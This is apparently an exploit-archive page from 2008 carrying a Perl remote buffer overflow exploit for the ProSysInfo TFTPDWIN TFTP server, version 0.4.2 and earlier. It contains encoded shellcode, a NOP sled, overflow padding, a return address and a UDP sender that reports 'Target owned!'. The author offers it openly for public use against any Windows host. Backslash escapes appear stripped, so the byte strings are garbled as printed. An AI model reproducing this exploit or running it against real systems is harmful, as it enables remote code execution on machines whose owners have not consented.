ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BOF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BOF Exploit
# Published : 2008-12-14
# Author : SkD
# Previous Title : MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)
# Next Title : TmaxSoft JEUS Alternate Data Streams File Disclosure Vulnerability

#!/usr/bin/perl
#
# ProSysInfo TFTP server TFTPDWIN <= 0.4.2
# Universal Remote Buffer Overflow Exploit
# [Works on all Windows versions.]
# ----------------------------------------
# Exploit by SkD (skdrat@hotmail.com)
#
# Let's take a description from their page at:
#      http://www.tftpserver.prosysinfo.com.pl
#
# "The TFTP Server TFTPDWIN software is a
#  multithreaded TFTP protocol server for
#  Windows 98/Me/2000/XP/2003. TFTP Server
#  TFTPDWIN is compatible with RFC 1350,
#  RFC 2347, RFC 2348, and RFC 2349, documents."
#
# Some of their clients include: CISCO, Alcatel-Lucent,
# Intel, AT&T, Panasonic, Boeing ...
#
# Wow, all of these companies use this software!
# This is pretty much serious.
#
# So this is my new exploit and I made it universal like
# the last one. This overflow was pretty much weird at
# first sight, but a bit of looking into the software
# can tell you many things about it!
#
# If Immunity (www.immunityinc.com) can make a commerical
# exploit for this and keep it for private clients,
# so can I ;) but to the public :). Have fun ladies &
# gents.
#
# Usage: prosystftpd_exploit.pl <target IP>
#
# Greets fly to InTeL.
#
# WARNING: Author has no responsibility over the damage
# you do using this!
 
 
 
use IO::Socket;
use warnings;
use strict;
 
if(!($ARGV[0]))
{
 print "[x] ProSysInfo TFTP server TFTPDWIN <= 0.4.2n";
 print "    Universal Remote Buffer Overflow Exploitnn";
 print "[x] Exploit by SkD (skdrat@ hotmail.com)nn";
 print "[x] Usage: prosystftpd_exploit.pl <target IP>nn";
 exit(0);
}
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com
# Restricted chars = 0x00 0x6e 0x65 0x74
my $shellcode =
"x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0exaf".
"x4fxb9xecx83xeexfcxe2xf4x53xa7xfdxecxafx4fx32xa9".
"x93xc4xc5xe9xd7x4ex56x67xe0x57x32xb3x8fx4ex52xa5".
"x24x7bx32xedx41x7ex79x75x03xcbx79x98xa8x8ex73xe1".
"xaex8dx52x18x94x1bx9dxe8xdaxaax32xb3x8bx4ex52x8a".
"x24x43xf2x67xf0x53xb8x07x24x53x32xedx44xc6xe5xc8".
"xabx8cx88x2cxcbxc4xf9xdcx2ax8fxc1xe0x24x0fxb5x67".
"xdfx53x14x67xc7x47x52xe5x24xcfx09xecxafx4fx32x84".
"x93x10x88x1axcfx19x30x14x2cx8fxc2xbcxc7xbfx33xe8".
"xf0x27x21x12x25x41xeex13x48x2cxd8x80xccx4fxb9xec";
 
my $p1="x00x01";
my $p2="x00x6ex65x74x61x73x63x69x69x00";
 
my $ret = "x5dx10x40"; #0040105D  -> :)  SkD's Tricks
my $nopsled = "x90" x 10;
my $len = (274 - length($shellcode));
 
if($len < 0) {
    print "[x] Your shellcode is too big! Find another way :)n";
        exit(0);
}
 
my $overflow = "x41" x $len;
 
my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret).($p2));
 
my $sock = new IO::Socket::INET(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>'69');
 
die "[x] Cannot Connect!n" unless $sock;
 
print "[x] Connected to daemon :)n";
print "[x] Sending packet..n";
print $sock $packet;
sleep(1);
close $sock;
print "[x] Target owned!n";
exit(0);

# www.Syue.com [2008-12-14]